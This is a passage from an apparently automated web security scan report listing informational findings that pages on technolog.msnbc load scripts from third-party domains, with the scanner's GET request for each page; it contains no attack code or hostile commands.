Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/ipad

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /ipad HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.346. http://technolog.msnbc.redacted/iphone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/iphone

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /iphone HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.347. http://technolog.msnbc.redacted/itunes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/itunes

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /itunes HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.348. http://technolog.msnbc.redacted/justin-bieber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/justin-bieber

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /justin-bieber HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.349. http://technolog.msnbc.redacted/kinect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/kinect

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://ww2.kktv.com/global/video/videoplayer.js?rnd=972561;hostDomain=ww2.KKTV.com;playerWidth=640;playerHeight=480;isShowIcon=true;clipId=5447758;flvUri=;partnerclipid=;adTag=News;advertisingZone=undefined;enableAds=false;landingPage=http%253A%252F%252Fwww.kktv.com%252Fvideo%252F;islandingPageoverride=false;playerType=MINI_EMBEDDEDscript
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /kinect HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.350. http://technolog.msnbc.redacted/mark-zuckerberg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/mark-zuckerberg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /mark-zuckerberg HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.351. http://technolog.msnbc.redacted/meme previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/meme

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /meme HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.352. http://technolog.msnbc.redacted/microsoft previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/microsoft

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /microsoft HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.353. http://technolog.msnbc.redacted/motion-controls previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/motion-controls

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://ww2.kktv.com/global/video/videoplayer.js?rnd=972561;hostDomain=ww2.KKTV.com;playerWidth=640;playerHeight=480;isShowIcon=true;clipId=5447758;flvUri=;partnerclipid=;adTag=News;advertisingZone=undefined;enableAds=false;landingPage=http%253A%252F%252Fwww.kktv.com%252Fvideo%252F;islandingPageoverride=false;playerType=MINI_EMBEDDEDscript
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /motion-controls HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.354. http://technolog.msnbc.redacted/nintendo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/nintendo

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /nintendo HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.355. http://technolog.msnbc.redacted/nintendo-3ds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/nintendo-3ds

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /nintendo-3ds HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.356. http://technolog.msnbc.redacted/online-privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/online-privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /online-privacy HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.357. http://technolog.msnbc.redacted/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /privacy HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.358. http://technolog.msnbc.redacted/samsung previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/samsung

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /samsung HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
